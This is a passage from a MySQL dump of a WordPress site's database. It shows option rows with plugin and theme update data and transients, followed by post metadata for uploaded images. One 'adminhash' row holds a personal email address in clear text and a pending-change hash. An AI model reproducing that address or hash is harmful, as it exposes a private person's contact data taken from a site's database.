on\";s:6:\"5.6.20\";s:12:\"is_supported\";b:0;s:9:\"is_secure\";b:0;s:13:\"is_acceptable\";b:0;}','no'),(38235,'adminhash','a:2:{s:4:\"hash\";s:32:\"1b54a6856bf23b28a34d890429e07fc8\";s:8:\"newemail\";s:17:\"yaaripe@gmail.com\";}','yes'),(38243,'_transient_timeout_googlesitekit_sc_data_e5817ab320257c1ff1c744ceccc34829','1596718079','no'),(38244,'_transient_googlesitekit_sc_data_e5817ab320257c1ff1c744ceccc34829','1','no'),(38250,'_transient_timeout_googlesitekit_sc_data_a470c42590655583a97004af2f85f804','1596718320','no'),(38251,'_transient_googlesitekit_sc_data_a470c42590655583a97004af2f85f804','1','no'),(38252,'_transient_timeout_googlesitekit_sc_data_828d0dc86df63af44a20613f62c66999','1596718336','no'),(38253,'_transient_googlesitekit_sc_data_828d0dc86df63af44a20613f62c66999','1','no'),(38254,'_transient_timeout_googlesitekit_sc_data_2def446a1d309fc48ed4232551988c00','1596718337','no'),(38255,'_transient_googlesitekit_sc_data_2def446a1d309fc48ed4232551988c00','1','no'),(38256,'_transient_timeout_googlesitekit_sc_data_e49675309a7b320900397e799d72ac84','1596718338','no'),(38257,'_transient_googlesitekit_sc_data_e49675309a7b320900397e799d72ac84','1','no'),(38258,'_transient_timeout_googlesitekit_sc_data_4b905f3c9d8aca77555e340aa6d23c82','1596718338','no'),(38259,'_transient_googlesitekit_sc_data_4b905f3c9d8aca77555e340aa6d23c82','1','no'),(38260,'_transient_timeout_googlesitekit_sc_data_baff262b94bbb92274aa34a6e04736f7','1596718340','no'),(38261,'_transient_googlesitekit_sc_data_baff262b94bbb92274aa34a6e04736f7','1','no'),(38262,'_transient_timeout_googlesitekit_sc_data_493a6a99a282b13d47ca604aaea53b67','1596718341','no'),(38263,'_transient_googlesitekit_sc_data_493a6a99a282b13d47ca604aaea53b67','1','no'),(38264,'_transient_timeout_googlesitekit_sc_data_bf0c7f88fd73c6c6aeb5c3f2b96d14cf','1596718342','no'),(38265,'_transient_googlesitekit_sc_data_bf0c7f88fd73c6c6aeb5c3f2b96d14cf','1','no'),(38266,'_transient_timeout_googlesitekit_sc_data_3cbbdb927980ca285926a23b03626a38','1596718343','no'),(38267,'_transient_googlesitekit_sc_data_3cbbdb927980ca285926a23b03626a38','1','no'),(38268,'_transient_timeout_googlesitekit_sc_data_61c1c9fb7fa73b952eefaed795dfa53c','1596718345','no'),(38269,'_transient_googlesitekit_sc_data_61c1c9fb7fa73b952eefaed795dfa53c','1','no'),(38270,'_transient_timeout_googlesitekit_sc_data_29ffda1de9d76f79352830b1c922f042','1596718347','no'),(38271,'_transient_googlesitekit_sc_data_29ffda1de9d76f79352830b1c922f042','1','no'),(38272,'_transient_timeout_googlesitekit_sc_data_f9399dc7fcc7a132fa8b3b62e9d30d8f','1596718348','no'),(38273,'_transient_googlesitekit_sc_data_f9399dc7fcc7a132fa8b3b62e9d30d8f','1','no'),(38274,'_transient_timeout_googlesitekit_sc_data_890c6bdcf12d6b57a572f99ceb0e9222','1596718356','no'),(38275,'_transient_googlesitekit_sc_data_890c6bdcf12d6b57a572f99ceb0e9222','1','no'),(38276,'_transient_timeout_googlesitekit_sc_data_15a0a4c3714d15871a8c919f7ff20b37','1596718357','no'),(38277,'_transient_googlesitekit_sc_data_15a0a4c3714d15871a8c919f7ff20b37','1','no'),(38300,'_transient_timeout_googlesitekit_sc_data_3100006005097b1893795d6c7bce67c4','1596718607','no'),(38301,'_transient_googlesitekit_sc_data_3100006005097b1893795d6c7bce67c4','1','no'),(38302,'_transient_timeout_googlesitekit_sc_data_c525680fcd0efe89a36b020e000094ef','1596718608','no'),(38303,'_transient_googlesitekit_sc_data_c525680fcd0efe89a36b020e000094ef','1','no'),(38320,'_transient_timeout_googlesitekit_sc_data_5f2397cc56337e4de14be6fba730fbf2','1596730821','no'),(38321,'_transient_googlesitekit_sc_data_5f2397cc56337e4de14be6fba730fbf2','1','no'),(38340,'_transient_is_multi_author','0','yes'),(38380,'_site_transient_update_themes','O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1596695019;s:7:\"checked\";a:4:{s:13:\"twentyfifteen\";s:3:\"1.9\";s:14:\"twentynineteen\";s:3:\"1.3\";s:15:\"twentyseventeen\";s:3:\"1.5\";s:13:\"twentysixteen\";s:3:\"1.4\";}s:8:\"response\";a:4:{s:13:\"twentyfifteen\";a:6:{s:5:\"theme\";s:13:\"twentyfifteen\";s:11:\"new_version\";s:3:\"2.6\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentyfifteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentyfifteen.2.6.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:5:\"5.2.4\";}s:14:\"twentynineteen\";a:6:{s:5:\"theme\";s:14:\"twentynineteen\";s:11:\"new_version\";s:3:\"1.6\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentynineteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentynineteen.1.6.zip\";s:8:\"requires\";s:5:\"4.9.6\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:15:\"twentyseventeen\";a:6:{s:5:\"theme\";s:15:\"twentyseventeen\";s:11:\"new_version\";s:3:\"2.3\";s:3:\"url\";s:45:\"https://wordpress.org/themes/twentyseventeen/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentyseventeen.2.3.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:13:\"twentysixteen\";a:6:{s:5:\"theme\";s:13:\"twentysixteen\";s:11:\"new_version\";s:3:\"2.1\";s:3:\"url\";s:43:\"https://wordpress.org/themes/twentysixteen/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/twentysixteen.2.1.zip\";s:8:\"requires\";s:3:\"4.4\";s:12:\"requires_php\";s:5:\"5.2.4\";}}s:12:\"translations\";a:0:{}}','no'),(38382,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1596695019;s:7:\"checked\";a:13:{s:19:\"akismet/akismet.php\";s:5:\"4.0.3\";s:33:\"duplicate-post/duplicate-post.php\";s:5:\"3.2.4\";s:23:\"elementor/elementor.php\";s:5:\"2.9.8\";s:31:\"elementor-pro/elementor-pro.php\";s:5:\"2.9.4\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:5:\"7.0.6\";s:9:\"hello.php\";s:3:\"1.7\";s:35:\"insert-headers-and-footers/ihaf.php\";s:5:\"1.4.4\";s:27:\"redirection/redirection.php\";s:5:\"3.6.3\";s:48:\"simple-301-redirects/wp-simple-301-redirects.php\";s:4:\"1.07\";s:35:\"google-site-kit/google-site-kit.php\";s:5:\"1.8.1\";s:23:\"wp-smushit/wp-smush.php\";s:5:\"3.4.2\";s:23:\"wp-rocket/wp-rocket.php\";s:5:\"3.0.4\";s:24:\"wordpress-seo/wp-seo.php\";s:4:\"12.4\";}s:8:\"response\";a:8:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.1.6\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.1.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.4.2\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:33:\"duplicate-post/duplicate-post.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:28:\"w.org/plugins/duplicate-post\";s:4:\"slug\";s:14:\"duplicate-post\";s:6:\"plugin\";s:33:\"duplicate-post/duplicate-post.php\";s:11:\"new_version\";s:5:\"3.2.5\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/duplicate-post/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/duplicate-post.3.2.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/duplicate-post/assets/icon-256x256.png?rev=2336666\";s:2:\"1x\";s:67:\"https://ps.w.org/duplicate-post/assets/icon-128x128.png?rev=2336666\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/duplicate-post/assets/banner-1544x500.png?rev=2336666\";s:2:\"1x\";s:69:\"https://ps.w.org/duplicate-post/assets/banner-772x250.png?rev=2336666\";}s:11:\"banners_rtl\";a:0:{}s:14:\"upgrade_notice\";s:80:\"<p>First release from Yoast + accessibility improvements + filter deprecated</p>\";s:6:\"tested\";s:5:\"5.4.2\";s:12:\"requires_php\";s:5:\"5.2.4\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:23:\"elementor/elementor.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:6:\"2.9.14\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/elementor.2.9.14.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.5\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:50:\"google-analytics-for-wordpress/googleanalytics.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:44:\"w.org/plugins/google-analytics-for-wordpress\";s:4:\"slug\";s:30:\"google-analytics-for-wordpress\";s:6:\"plugin\";s:50:\"google-analytics-for-wordpress/googleanalytics.php\";s:11:\"new_version\";s:6:\"7.11.0\";s:3:\"url\";s:61:\"https://wordpress.org/plugins/google-analytics-for-wordpress/\";s:7:\"package\";s:80:\"https://downloads.wordpress.org/plugin/google-analytics-for-wordpress.7.11.0.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:83:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon-256x256.png?rev=1598927\";s:2:\"1x\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=1598927\";s:3:\"svg\";s:75:\"https://ps.w.org/google-analytics-for-wordpress/assets/icon.svg?rev=1598927\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:86:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-1544x500.png?rev=2159532\";s:2:\"1x\";s:85:\"https://ps.w.org/google-analytics-for-wordpress/assets/banner-772x250.png?rev=2159532\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.4.2\";s:12:\"requires_php\";s:3:\"5.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:9:\"hello.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.2.7\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:35:\"insert-headers-and-footers/ihaf.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:40:\"w.org/plugins/insert-headers-and-footers\";s:4:\"slug\";s:26:\"insert-headers-and-footers\";s:6:\"plugin\";s:35:\"insert-headers-and-footers/ihaf.php\";s:11:\"new_version\";s:5:\"1.4.6\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/insert-headers-and-footers/\";s:7:\"package\";s:75:\"https://downloads.wordpress.org/plugin/insert-headers-and-footers.1.4.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/insert-headers-and-footers/assets/icon-256x256.png?rev=1610266\";s:2:\"1x\";s:79:\"https://ps.w.org/insert-headers-and-footers/assets/icon-128x128.png?rev=1610266\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:81:\"https://ps.w.org/insert-headers-and-footers/assets/banner-772x250.png?rev=1610266\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.4.2\";s:12:\"requires_php\";s:3:\"5.2\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:27:\"redirection/redirection.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/redirection\";s:4:\"slug\";s:11:\"redirection\";s:6:\"plugin\";s:27:\"redirection/redirection.php\";s:11:\"new_version\";s:3:\"4.8\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/redirection/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/redirection.4.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/redirection/assets/icon-256x256.jpg?rev=983639\";s:2:\"1x\";s:63:\"https://ps.w.org/redirection/assets/icon-128x128.jpg?rev=983640\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/redirection/assets/banner-1544x500.jpg?rev=983641\";s:2:\"1x\";s:65:\"https://ps.w.org/redirection/assets/banner-772x250.jpg?rev=983642\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.4.2\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}s:35:\"google-site-kit/google-site-kit.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:29:\"w.org/plugins/google-site-kit\";s:4:\"slug\";s:15:\"google-site-kit\";s:6:\"plugin\";s:35:\"google-site-kit/google-site-kit.php\";s:11:\"new_version\";s:6:\"1.13.1\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/google-site-kit/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/google-site-kit.1.13.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/google-site-kit/assets/icon-256x256.png?rev=2181376\";s:2:\"1x\";s:68:\"https://ps.w.org/google-site-kit/assets/icon-128x128.png?rev=2181376\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/google-site-kit/assets/banner-1544x500.png?rev=2182425\";s:2:\"1x\";s:70:\"https://ps.w.org/google-site-kit/assets/banner-772x250.png?rev=2182425\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.4.2\";s:12:\"requires_php\";s:3:\"5.6\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:3:{s:48:\"simple-301-redirects/wp-simple-301-redirects.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:34:\"w.org/plugins/simple-301-redirects\";s:4:\"slug\";s:20:\"simple-301-redirects\";s:6:\"plugin\";s:48:\"simple-301-redirects/wp-simple-301-redirects.php\";s:11:\"new_version\";s:4:\"1.07\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/simple-301-redirects/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/simple-301-redirects.1.07.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:64:\"https://s.w.org/plugins/geopattern-icon/simple-301-redirects.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}}s:23:\"wp-smushit/wp-smush.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:24:\"w.org/plugins/wp-smushit\";s:4:\"slug\";s:10:\"wp-smushit\";s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:11:\"new_version\";s:5:\"3.6.3\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/wp-smushit/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/wp-smushit.3.6.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/wp-smushit/assets/icon-256x256.gif?rev=2263432\";s:2:\"1x\";s:63:\"https://ps.w.org/wp-smushit/assets/icon-128x128.gif?rev=2263431\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/wp-smushit/assets/banner-1544x500.png?rev=1863697\";s:2:\"1x\";s:65:\"https://ps.w.org/wp-smushit/assets/banner-772x250.png?rev=1863697\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"5.4.2\";s:12:\"requires_php\";s:6:\"5.6.20\";s:13:\"compatibility\";a:0:{}}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:4:\"14.7\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wordpress-seo.14.7.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=1834347\";s:2:\"1x\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=1946641\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=1946641\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=1843435\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=1843435\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=1843435\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=1843435\";}s:6:\"tested\";s:3:\"5.5\";s:12:\"requires_php\";s:6:\"5.6.20\";s:13:\"compatibility\";a:0:{}}}}','no'),(38384,'_site_transient_update_wprocket','1596695021','no'),(38392,'_site_transient_timeout_theme_roots','1596713194','no'),(38393,'_site_transient_theme_roots','a:4:{s:13:\"twentyfifteen\";s:7:\"/themes\";s:14:\"twentynineteen\";s:7:\"/themes\";s:15:\"twentyseventeen\";s:7:\"/themes\";s:13:\"twentysixteen\";s:7:\"/themes\";}','no');
/*!40000 ALTER TABLE `xrx_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xrx_postmeta`
--

DROP TABLE IF EXISTS `xrx_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xrx_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=6258 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xrx_postmeta`
--

LOCK TABLES `xrx_postmeta` WRITE;
/*!40000 ALTER TABLE `xrx_postmeta` DISABLE KEYS */;
INSERT INTO `xrx_postmeta` VALUES (11,7,'_edit_last','1'),(12,7,'_edit_lock','1596644367:1'),(13,7,'_wp_page_template','elementor_header_footer'),(14,7,'_elementor_edit_mode','builder'),(16,9,'_wp_attached_file','2018/05/52.png'),(17,9,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:198;s:6:\"height\";i:171;s:4:\"file\";s:14:\"2018/05/52.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"52-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:14:\"52-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18,9,'_elementor_source_image_hash','4291ca675bd5f9ae61c3b8bd7e9923cb44179680'),(19,10,'_wp_attached_file','2018/05/todd-quackenbush-700.png'),(20,10,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1621;s:6:\"height\";i:848;s:4:\"file\";s:32:\"2018/05/todd-quackenbush-700.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"todd-quackenbush-700-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"todd-quackenbush-700-300x157.png\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"todd-quackenbush-700-768x402.png\";s:5:\"width\";i:768;s:6:\"height\";i:402;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"todd-quackenbush-700-1024x536.png\";s:5:\"width\";i:1024;s:6:\"height\";i:536;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:32:\"todd-quackenbush-700-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21,10,'_elementor_source_image_hash','577e2b1feb6c8d2adecaed070ed72c4e3ce869f2'),(22,11,'_wp_attached_file','2018/05/Group-30-1.png'),(23,11,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:616;s:6:\"height\";i:358;s:4:\"file\";s:22:\"2018/05/Group-30-1.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Group-30-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Group-30-1-300x174.png\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:22:\"Group-30-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24,11,'_elementor_source_image_hash','888f868f3d75f1182a2e3d39d9278df964ed0caa'),(25,12,'_wp_attached_file','2018/05/Group-11.png'),(26,12,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:175;s:6:\"height\";i:174;s:4:\"file\";s:20:\"2018/05/Group-11.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Group-11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:20:\"Group-11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27,12,'_elementor_source_image_hash','c15b334ac9f73937ee498e45d423a8b50fd336c9'),(28,13,'_wp_attached_file','2018/05/Group-12-Copy.png'),(29,13,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:174;s:6:\"height\";i:174;s:4:\"file\";s:25:\"2018/05/Group-12-Copy.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Group-12-Copy-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:25:\"Group-12-Copy-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30,13,'_elementor_source_image_hash','5feafb2499e27124c5e827c43e2c6e8ab9bfd5ae'),(31,14,'_wp_attached_file','2018/05/andre-branco-58366.png'),(32,14,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:174;s:6:\"height\";i:174;s:4:\"file\";s:30:\"2018/05/andre-branco-58366.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"andre-branco-58366-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:30:\"andre-branco-58366-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33,14,'_elementor_source_image_hash','17cb564d4f79726a2313f0caf285fdea99c2e894'),(34,15,'_wp_attached_file','2018/05/6.png'),(35,15,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:175;s:6:\"height\";i:174;s:4:\"file\";s:13:\"2018/05/6.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"6-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4: